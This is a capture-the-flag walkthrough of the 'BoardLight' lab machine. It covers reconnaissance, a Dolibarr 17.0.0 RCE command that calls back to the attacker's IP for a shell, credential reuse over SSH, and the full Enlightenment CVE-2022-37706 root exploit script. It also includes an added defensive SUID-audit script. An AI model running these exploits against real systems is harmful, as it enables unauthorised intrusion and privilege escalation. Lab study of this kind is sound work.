[Machines] [Easy] BoardLight: Dolibarr 17.0.0 RCE + Enlightenment v0.25.3 privilege escalation

Information gathering

IP Address      Open Ports
10.10.11.11     TCP: 22, 80

$ nmap -p- 10.10.11.11 --min-rate 1000 -sC -sV

PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 06:2d:3b:85:10:59:ff:73:66:27:7f:0e:ae:03:ea:f4 (RSA)
|   256 59:03:dc:52:87:3a:35:99:34:44:74:33:78:31:35:fb (ECDSA)
|_  256 ab:13:38:e4:3e:e0:24:b4:69:38:a9:63:82:38:dd:f4 (ED25519)
80/tcp    open     http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
8221/tcp  filtered unknown
9564/tcp  filtered unknown
19285/tcp filtered unknown
19837/tcp filtered unknown
20734/tcp filtered unknown
24875/tcp filtered unknown
26918/tcp filtered unknown
36270/tcp filtered unknown
36538/tcp filtered unknown
38225/tcp filtered unknown
40483/tcp filtered unknown
53279/tcp filtered unknown
56489/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

HTTP and subdomain discovery

$ whatweb 10.10.11.11

$ echo "10.10.11.11 board.htb" | sudo tee -a /etc/hosts

$ ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://board.htb -H "Host: FUZZ.board.htb" -fs 15949

$ echo "10.10.11.11 crm.board.htb" | sudo tee -a /etc/hosts

http://crm.board.htb/

username: admin  password: admin

https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253

$ python3 exp.py http://crm.board.htb admin admin 10.10.16.24 10032

www-data@boardlight:~/html$ cat ./crm.board.htb/htdocs/conf/conf.php

username: dolibarrowner
password: serverfun2$2023!!

The database password from conf.php is reused by the local user larissa, so it is accepted over SSH:

$ ssh larissa@10.10.11.11

User.txt

b7f82dc5b4ed058a7ea007f02cafde10

Privilege escalation

larissa@boardlight:/tmp$ find / -perm -4000 -type f 2>/dev/null
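The find above is exactly the check a defender should run first. As an added example that is not part of the original write-up, the script below audits a list of SUID binaries against a baseline allowlist so that an unexpected setuid helper such as enlightenment_sys stands out. The BASELINE paths are an assumption for a stock Ubuntu 20.04 install (trim or extend them to match your own golden image), and SAMPLE_SUID_LIST is a constructed stand-in for the find output on the compromised host.

```bash
#!/bin/bash
# Added example (not from the original write-up): audit SUID binaries on a
# host against an allowlist and report anything outside it.

# Assumption: SUID binaries expected on a stock Ubuntu 20.04 image. Adjust
# this list to your own baseline before relying on it.
BASELINE='/usr/bin/sudo
/usr/bin/su
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/mount
/usr/bin/umount
/usr/bin/fusermount
/usr/bin/pkexec
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper'

# Constructed sample standing in for `find / -perm -4000 -type f` output on
# the compromised host; the enlightenment_sys path is the helper the
# CVE-2022-37706 exploit on this page looks for.
SAMPLE_SUID_LIST='/usr/bin/sudo
/usr/bin/passwd
/usr/bin/mount
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
/usr/bin/su'

# suid_unexpected LIST
# Print every path in LIST (newline-separated) that is not in BASELINE.
suid_unexpected() {
    printf '%s\n' "$1" | while IFS= read -r path; do
        [ -n "$path" ] || continue
        # -x: whole-line match, -F: literal string, so "/usr/bin/su" does
        # not match "/usr/bin/sudo"
        if ! printf '%s\n' "$BASELINE" | grep -qxF -- "$path"; then
            printf '%s\n' "$path"
        fi
    done
}

# suid_unexpected_count LIST
# Number of unexpected SUID binaries; 0 means the host matches the baseline.
suid_unexpected_count() {
    suid_unexpected "$1" | awk 'END { print NR }'
}

# suid_audit_live
# Run the same check against the real filesystem (no privileges needed; find
# simply skips directories it cannot read). For each offending path, print the
# command that drops the setuid bit as a stop-gap until the package is
# upgraded (Enlightenment fixed CVE-2022-37706 in 0.25.4).
suid_audit_live() {
    local live
    live=$(find / -perm -4000 -type f 2>/dev/null)
    suid_unexpected "$live" | while IFS= read -r path; do
        printf 'unexpected SUID binary: %s\n' "$path"
        printf '  stop-gap: sudo chmod u-s %s\n' "$path"
    done
}

# Demo on the constructed sample; call suid_audit_live on a real host instead.
suid_unexpected "$SAMPLE_SUID_LIST"
```

Run on a real host, suid_audit_live prints the enlightenment_sys helper together with the chmod u-s stop-gap; removing the setuid bit is what actually closes the path the exploit script below depends on, since it relies on the helper running as root.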

https://www.exploit-db.com/exploits/51180

#!/bin/bash

echo "CVE-2022-37706"
echo "[*] Trying to find the vulnerable SUID file..."
echo "[*] This may take few seconds..."

file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)
if [[ -z ${file} ]]
then
	echo "[-] Couldn't find the vulnerable SUID file..."
	echo "[*] Enlightenment should be installed on your system."
	exit 1
fi

echo "[+] Vulnerable SUID binary found!"
echo "[+] Trying to pop a root shell!"
mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"

echo "/bin/sh" > /tmp/exploit
chmod a+x /tmp/exploit
echo "[+] Enjoy the root shell :)"
${file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net

larissa@boardlight:/tmp$ chmod +x exp.sh

larissa@boardlight:/tmp$ bash exp.sh

Root.txt

f1844b04972e657f7e59544e69e23c20
